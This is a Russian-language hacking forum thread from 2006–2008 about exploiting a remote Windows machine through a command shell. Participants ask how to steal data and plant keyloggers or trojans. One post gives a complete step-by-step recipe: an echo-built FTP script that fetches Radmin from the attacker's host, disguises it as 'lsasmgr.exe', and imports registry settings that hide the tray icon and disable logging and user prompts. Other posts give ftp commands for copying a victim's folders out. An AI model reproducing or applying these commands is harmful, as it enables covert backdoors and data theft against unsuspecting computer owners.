Доступ через cmd.exe
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя |
Сообщение |
<< Старые топики Новые топики >> |
|
|
Доступ через cmd.exe - 2006-07-26 12:53:34
|
|
|
Vladi_boom
Сообщений: 55
Оценки: 0
Присоединился: 2005-03-11 13:09:16
|
Добрый день. Помогите пожалуйста, есть доступ к удаленному компьютеру (с помощью забугорного эксплойта добыл командную строку). Пробую залить Радмина, заливается, в процессах висит, а не подключается. Так вот, как можно слить оттуда данные. И какого посоветуете поставить кейлоггера.
|
|
|
Доступ через cmd.exe - 2006-07-26 20:11:39
|
|
|
Pupkin-Zade
Сообщений: 9398
Оценки: 1489
Присоединился: 2004-03-10 13:54:16
|
Слить просто - запустить у себя ФТП сервер и на него сскачать от зараженной машины
|
|
|
Доступ через cmd.exe - 2006-07-27 15:28:00
|
|
|
Vladi_boom
Сообщений: 55
Оценки: 0
Присоединился: 2005-03-11 13:09:16
|
Каким образом? mput? Он требует подтверждения копирования. Какими еще способами можно слить инфу к себе на FTP?
|
|
|
Доступ через cmd.exe - 2006-07-27 17:20:37
|
|
|
Pupkin-Zade
Сообщений: 9398
Оценки: 1489
Присоединился: 2004-03-10 13:54:16
|
Есть такая страшно сикретная команда ftp…
|
|
|
Доступ через cmd.exe - 2006-07-28 06:49:14
|
|
|
Vladi_boom
Сообщений: 55
Оценки: 0
Присоединился: 2005-03-11 13:09:16
|
[sm=1.gif], Вообщето я и говорю про ftp. Или mput не под FTP работает [sm=2.gif]. И ещё когда запускаешь (например ftp -i -s:asd.txt - в котором прописано open ftp.xxx.xx login pass mput path\filename bye)
на машине юзера кратковременно появляется черное окно. А это не есть гуд
|
|
|
Доступ через cmd.exe - 2006-08-01 01:54:47
|
|
|
RPN
Сообщений: 5
Оценки: 0
Присоединился: 2006-07-26 09:50:54
|
Ой, я все же спрошу (не посчитайте меня идиотом) А у тебя в листинге параметры имеют именно эти же значения, что ты написал или же ты сам свои прописывал? А вообще если окно черное, то скорей всего запрос до цели не до ходят. Тут мне в голову приходит 2 мысли. Либо ты ftp у себя не коректно поставил, если ваще поставил, либо фаер думает "Что за Х* лезет и что с ним делать?" Но в второй вариант отключим, ты ж все-таки как-то к нему залез
|
|
|
Доступ через cmd.exe - 2006-08-01 08:32:48
|
|
|
Vladi_boom
Сообщений: 55
Оценки: 0
Присоединился: 2005-03-11 13:09:16
|
Всё. Уже разобрался. Всем спасибо.
|
|
|
RE: Доступ через cmd.exe - 2006-09-24 13:44:13.336666
|
|
|
*][akep
Сообщений: 144
Оценки: 0
Присоединился: 2006-08-24 17:36:15
|
А у меня похожий вопрос.Как заливать трои на заражонную мащину через cmd?
|
|
|
RE: Доступ через cmd.exe - 2006-09-25 10:00:08.976666
|
|
|
j0ker_
Сообщений: 609
Оценки: 0
Присоединился: 2005-03-07 15:09:25
|
quote:
ORIGINAL: *][akep А у меня похожий вопрос.Как заливать трои на заражонную мащину через cmd? Через FTP
|
|
|
RE: Доступ через cmd.exe - 2006-09-26 18:56:31.086666
|
|
|
*][akep
Сообщений: 144
Оценки: 0
Присоединился: 2006-08-24 17:36:15
|
quote:
ORIGINAL: j0ker_ quote:
ORIGINAL: *][akep А у меня похожий вопрос.Как заливать трои на заражонную мащину через cmd? Через FTP А если у него и FTP нету..Как я ему тогда залью?
|
|
|
RE: Доступ через cmd.exe - 2006-09-26 21:07:37.553333
|
|
|
Led_Zeppelin
Сообщений: 20
Оценки: 0
Присоединился: 2006-03-14 19:14:49
|
Должен быть, даже я нуб, знаю =)
|
|
|
RE: Доступ через cmd.exe - 2006-09-28 06:42:53.133333
|
|
|
Lombardo
Сообщений: 6
Оценки: 0
Присоединился: 2006-09-28 05:38:55.070000
|
собосно рецепт такоф… тока те требуется установить у ся FTP сервер, надеюсь мазгов у тя на то, что бы найти инфу по установке ftp сервера на своей машине, хватит… если хватило, то выложи в коренвую деректорию (/) радминовские файлы (raddrv.dll и r_server.exe) создай файл rad.reg, в который впиши собсно это: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin] [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0] [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server] [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\iplist] [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\NtUsers] "1"=hex: [HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters] "DisableTrayIcon"=hex:01,00,00,00 "NTAuthEnabled"=hex:00,00,00,00 "Parameter"=hex:c3,dc,03,fe,12,1c,b1,b9,8d,ae,76,0a,eb,7c,9b,29 "Port"=hex:a7,02,00,00 "Timeout"=hex:0a,00,00,00 "EnableLogFile"=hex:00,00,00,00 "LogFilePath"="c:\\logfile.txt" "FilterIp"=hex:00,00,00,00 "AutoAllow"=hex:00,00,00,00 "AskUser"=hex:00,00,00,00 "EnableEventLog"=hex:00,00,00,00 помести его так же в корневуху фиртуальной файловой системмы твоего FTP сервера (туда же, где и raddrv.dll r_server.exe) если и на это мозгов хватило (хатя уже сомневаюсь что хватило), то воспользуйся своим сплойтом и в консольке поочередно набирай следующую последовательность команд: х.х.х.х - твой IP адрес в той подседи, где и жертва. echo open x.x.x.x >.ra echo user ananymous >>.ra echo pass bla-bla@tut.by >>.ra echo binary>>.ra echo GET raddrv.dll c:\windows\system\raddrv.dll>>.ra echo GET r_server.exe c:\windows\system\lsasmgr.exe>>.ra echo GET rad.reg rad.reg >>.ra echo bye>>.ra ftp -v -n -s:.ra c:\windows\system\lsasmgr.exe /install /silence c:\windows\system\lsasmgr.exe /stop REG IMPORT rad.reg REG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v DisplayName /t REG_SZ /d "Service Host Controller" /f REG ADD HKLM\SYSTEM\CurrentControlSet\Services\r_server /v ImagePath /t REG_EXPAND_SZ /d ""c:\windows\system\lsasmgr.exe" /service" /f c:\windows\system\lsasmgr.exe /start del .ra del rad.reg если я ничего ненароком не забыл и у тебя все прошло упешно, то открывай радмин и подключайся к компу, который сплойтишь… пароль на доступ "solomandra" (без кавычег) вот, кажется и все… Если есть здесь присутствующие, которые знают другой, более экономичный в плане времени способ это зделать, то пишите, не стесняйтесь ;-) PS. То что я тут калякая спроведливо для радмина 2.2, для других версий, собсно, хз.
|
|
|
RE: Доступ через cmd.exe - 2006-09-28 06:47:38.413333
|
|
|
Lombardo
Сообщений: 6
Оценки: 0
Присоединился: 2006-09-28 05:38:55.070000
|
quote:
ORIGINAL: Led_Zeppelin Должен быть, даже я нуб, знаю =) вау… нуб… а что ты еще знаешь? поделись, своим профессионализмом… Ато я тут, всего какой-то системный инженер и специалист по компьютерной безопастности, аспирантура за плечами, а такой новости и не знал… :-/
|
|
|
RE: Доступ через cmd.exe - 2006-09-28 06:53:20.773333
|
|
|
Lombardo
Сообщений: 6
Оценки: 0
Присоединился: 2006-09-28 05:38:55.070000
|
quote:
ORIGINAL: *][akep А у меня похожий вопрос.Как заливать трои на заражонную мащину через cmd? А чем, по твоему, хакерЬ, отличается, с технической стороны дела, заливание радмина на машину, от заливания троя… или есчо чего нить… да хоть свой своп файл туда залей… останется тока переименовать его в pagefile.exe и запустить… если ты не знаешь как переименовать/запустить файл с помощью командного интерпретатора windows - то кури хелп, прилагающийся к маздаю, там ты найдешь много нового и интерестного… ;-)
|
|
|
RE: Доступ через cmd.exe - 2006-09-28 06:54:55.930000
|
|
|
KPOT_f!nd
Сообщений: 767
Оценки: 0
Присоединился: 2006-09-18 05:16:50.950000
|
quote:
собосно рецепт такоф… тока те требуется установить у ся FTP сервер Чел мы ему говорили что надо через FTP! :@ZLOY
|
|
|
RE: Доступ через cmd.exe - 2006-09-28 06:58:24.883333
|
|
|
Lombardo
Сообщений: 6
Оценки: 0
Присоединился: 2006-09-28 05:38:55.070000
|
quote:
ORIGINAL: KPOT_f!nd quote:
собосно рецепт такоф… тока те требуется установить у ся FTP сервер Чел мы ему говорили что надо через FTP! :@ZLOY как я понял, для него "через FTP" столь же отдоленное понятие, как для моей мамы… для моей мамы FTP это то, что в браузере начинается с ftp://
|
|
|
RE: Доступ через cmd.exe - 2007-12-14 14:56:59.940000
|
|
|
Belfigor
Сообщений: 80
Оценки: 0
Присоединился: 2007-05-07 03:37:58.466666
|
у меня проблема вот такого характера заливаю файлы C:\WINDOWS\system>ftp -v -n -s:.ra ftp -v -n -s:.ra Связь с 10.xx.xx.xx open 10.xx.xx.xxx 220 Golden FTP Server ready v1.92 user ananymous 331 User name okay, need password. 230 User logged in, proceed. GET AdmDLL.dll d:\windows\system\AdmDll.dll 200 PORT Command successful. Подключение разорвано удаленным узлом. bye начинаю просматривать файлы залиты но они по 0 б 14.12.2007 14:29 93 .ra 14.12.2007 14:17 0 drive_rezolution.exe 14.12.2007 14:19 0 sys.exe 14.12.2007 14:27 0 config.bat 14.12.2007 14:29 0 AdmDll.dll что за хрень ?? кто сталкивался отпишитесь пжл :) Всё разобрался САМ !!!:)
|
|
|
RE: Доступ через cmd.exe - 2007-12-19 18:11:37.403333
|
|
|
LamoSS
Сообщений: 15
Оценки: 0
Присоединился: 2007-12-17 22:43:51.056666
|
По рецепту от ломбардо, сделал все как написано, после ftp -v -n -s:.ra Ругается на <<нет связи>> + pass blabla@tyt.by — <<неверная команда>> Что делать-то?
|
|
|
RE: Доступ через cmd.exe - 2007-12-28 06:43:35.053333
|
|
|
Belfigor
Сообщений: 80
Оценки: 0
Присоединился: 2007-05-07 03:37:58.466666
|
quote:
ORIGINAL: LamoSS По рецепту от ломбардо, сделал все как написано, после ftp -v -n -s:.ra Ругается на <<нет связи>> + pass [email=blabla@tyt.by]blabla@tyt.by[/email] — <<неверная команда>> Что делать-то? Ставь себе TYPSoft FTP Server , создавай свой аккаунт и заливай , по принципу F:\Documents and Settings\sss>ftp ftp> o К xx.xxx.xxx.xxx Связь с xx.xxx.xxx.xxx 220 TYPSoft FTP Server 1.10 ready… Пользователь (xx.xxx.xxx.xxx:(none)): sss 331 Password required for sss. Пароль: 230 User sss logged in. ftp> dir 200 Port command successful. 150 Opening data connection for directory list. -rwxrwxrwx 1 ftp ftp 2918400 Dec 20 11:46 fly.exe -rwxrwxrwx 1 ftp ftp 349696 Dec 23 12:54 sex.exe -rw-rw-rw- 1 ftp ftp 50887648 Dec 23 14:00 Vova_Olya_Teens_F _chunk_1.wmv drw-rw-rw- 1 ftp ftp 0 Apr 30 19:00 sss 226 Transfer complete. ftp: 279 байт получено за 0,00 (сек) со скоростью 279000,00 (КБ/сек). ftp> Get sex.exe 200 Port command successful. 150 Opening data connection for sex.exe. 226 Transfer complete. ftp: 349696 байт получено за 0,16 (сек) со скоростью 2227,36 (КБ/сек).
|
|
|
RE: Доступ через cmd.exe - 2008-01-04 17:50:27.186666
|
|
|
Protec
Сообщений: 3
Оценки: 0
Присоединился: 2007-11-06 01:17:33.943333
|
Народ подскажите плз простейшую вещь, а то чет не получается. Значит я через експлойт запустил командную строку и заканектился к себе на фтп сервер. Вопрос дак как слить папки удаленного компа к себе на фтп? Не файлы а папки со всем содержимым. Напишите точный синтаксис плз. Ситуация - создан файл для конекта с моим ФТП на диске Ц. Когда я пишу FTP -s:file конекчюсь к своему фтп, и тем времене остаюсь на удаленном компе на диске с? Так вот в этой ситуации мне надо скапировать файлы с диска d удаленного компа , нужен точный синтаксис.
|
|
|
RE: Доступ через cmd.exe - 2008-01-04 19:59:14.346666
|
|
|
Protec
Сообщений: 3
Оценки: 0
Присоединился: 2007-11-06 01:17:33.943333
|
Ну что никто не знает как папки со всем содержимым, а НЕ ФАЙЛЫ скапировать. Надо типо - mput d:\*.* - скопировать на фтп все файлы корневого котолога d. - дальше он неможет открывать вложенные папки. А как сделать чтоб папки то скапировать со всем.??? И еще например D:\документы - оп все ппц русски не понемает не найдет путь, как с этим тоже боротся?
|
|
|
RE: Доступ через cmd.exe - 2008-01-04 21:08:48.793333
|
|
|
ra1l
Сообщений: 27
Оценки: 0
Присоединился: 2006-06-03 12:11:25
|
Вы товарисчи все kaht'ом чтоль балуетесь? :) ПОмниться видел где-то гуй-версию для совсем ленивых со встроенным ftp-сервером… А вообще по теме: ftp>mget *.exe к примеру скачает все exe-шники с каталога Также можно посмотреть в сторону команды mdir - сохранит листинг файлов из каталога на сервере в локальный файл, а потом сливать командой fget.
|
|
|
RE: Доступ через cmd.exe - 2008-01-05 05:06:46.173333
|
|
|
Belfigor
Сообщений: 80
Оценки: 0
Присоединился: 2007-05-07 03:37:58.466666
|
quote:
ORIGINAL: ra1l Вы товарисчи все kaht'ом чтоль балуетесь? :) ПОмниться видел где-то гуй-версию для совсем ленивых со встроенным ftp-сервером… А вообще по теме: ftp>mget *.exe к примеру скачает все exe-шники с каталога Также можно посмотреть в сторону команды mdir - сохранит листинг файлов из каталога на сервере в локальный файл, а потом сливать командой fget. а кто тебе сказал что тут балуются kaht'ом ? , тут уже все давно юзают Метасплоит 3 :D
|
|
|
RE: Доступ через cmd.exe - 2008-01-05 17:08:19.420000
|
|
|
ra1l
Сообщений: 27
Оценки: 0
Присоединился: 2006-06-03 12:11:25
|
quote:
ORIGINAL: Belfigor а кто тебе сказал что тут балуются kaht'ом ? , тут уже все давно юзают Метасплоит 3 :D Просто енти дела я забросил еще во времена виндов непатченых без сервис-паков… Про метасплоит слышал, но сам им не пользовалсо..
|
|
|
RE: Доступ через cmd.exe - 2008-02-22 20:55:56.413333
|
|
|
magistr_bender
Сообщений: 977
Оценки: 0
Присоединился: 2008-02-22 20:10:21.133333
|
народ дайте какойнить скомпиленый сплойт на винду ХР с СП2 только не дком или кахт
|
|
|
RE: Доступ через cmd.exe - 2008-02-25 18:43:52.316666
|
|
|
Swarovski
Сообщений: 11
Оценки: 0
Присоединился: 2008-02-25 17:59:10.643333
|
есть два компа в локалке,нужно с компа 2 перекинуть файлы на комп 1 так,чтобы комп 2 ничего не заметил как это сделать? пожалуйста по порядку, и со всеми командами
|
|
|
RE: Доступ через cmd.exe - 2008-03-09 07:41:19.426666
|
|
|
Father0fRain
Сообщений: 118
Оценки: 0
Присоединился: 2008-02-23 19:57:20.673333
|
Попорядку и со всеми командами? Хм…ВМЗ!
|
|
|
RE: Доступ через cmd.exe - 2008-04-08 21:47:39.790000
|
|
|
Kiting
Сообщений: 143
Оценки: 0
Присоединился: 2008-03-03 18:26:44.120000
|
Пипец сто раз уж обсуждалось!
|
|
|
|
|